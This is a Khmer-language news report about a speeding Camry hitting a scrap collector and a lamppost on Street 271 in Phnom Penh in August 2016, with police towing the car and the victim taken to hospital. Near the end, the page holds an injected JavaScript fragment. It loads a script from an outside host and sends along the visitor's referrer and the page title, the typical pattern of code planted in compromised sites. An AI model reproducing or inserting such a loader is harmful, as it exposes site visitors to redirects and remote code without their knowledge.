របួសធ្ងន់ម្នាក់ ខ្ទេចរថយន្តទំនើប ខណ:បើកបរមិនប្រយ័ត្ន(video)

ភ្នំពេញ: បុរសអ្នករើសអេតចាយម្នាក់បានរងរបួសធ្ងន់ ក្នុងហេតុការណ៏គ្រោះថ្នាក់ចរាចរណ៏មួយបង្កដោយរថយន្តកាម៊រីបាឡែនពាក់ស្លាកលេខ ភ្នំពេញ 2S- 0556

ពណ៍ខ្មៅមួយគ្រឿង បុក កាលពីវេលាម៉ោង ១ និង ៤០នាទីរំលងអាធ្រាត ឈានចូលថ្ងៃទី ១៧ សីហា ២០១៦ នៅតាមបណ្តោយផ្លូវ ២៧១ មុខសាលាវិទ្យាល័យជា ស៊ីមសាមគ្គី ស្ថិតក្នុងសង្កាត់ បឹងសាឡាង ខណ្ឌទួលគោក ហើយរថយន្តមិនអស់ល្បឿនទៅបុកបង្គោលភ្លើងបភ្លឺផ្លូវបណ្តាលអោយទ្រេតបន្ថែមទៀត តែបែជាសំណាងល្អអ្នកបើកបរមិនមានរងគ្រោះថ្នាក់ ។

 

ប្រភពបានអោយដឹងថា មុនកើតហេតុការណ៏នេះ គេបានឃើញរថយន្តកាម៊រីបាឡែនខាងលើបញ្ជាចង្កូតក្នងល្បឿនលឿនដោយបុរសម្នាក់ តាមបណ្តោយផ្លូវលេខ២៧១ ស្ថិតក្នុងទិសដៅពីជើងទៅត្បូង ខណ:មកដល់ចំណុចខាងលើ់ រថយន្តស្រាប់តែជ្រុលទៅបុករទេះងេតចាយប៉ើងបុរសម្ចាស់ខ្ទាតចេញ បណ្តាលអោយ រងរបួសធ្ងន់ ហើយរថយន្តមិនអស់ខឋល្បឿនទៅបុក

បង្គោលភ្លើង បណ្តាលអោយទ្រេតបន្ថែម ហើយរថយន្តបែកកង់មុខខ្ទេចមួយកំណាត់មុខទៅណាមិនរួច តែបែជាសំណាងល្អអ្នកបើកបរមិនមានរងគ្រោះថ្នាក់ ។

 

ក្រោយកើតហេតុសមត្ថកិច្ច ចុះវាស់វែង ស្ទួចយករថយន្តបង្កយកទៅកាន់ការិយាល័យចរាចរណ៍ផ្លូវគោកនៃស្នងការនគរបាលរាជធានីភ្នំពេញ ដើម្បីធ្វើការដោះស្រាយគ្នានៅពេលក្រោយ ។ ចំណែកអ្នករងគ្រោះត្រូវបានបញ្ជូនទៅសង្គ្រោះនៅមន្ទីរពេទ្យរ៉ុស្ស៊ី ។ដោយ៖ព្រះអង្គខ្មោមានរិទ្ធិ

00d9cd27-694b-4cc9-9e99-a896464503bb 29fc0ff4-2807-4596-90e3-08a5cd724150 e98314e9-1a5e-43fc-ba64-0bb3f86a6260s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More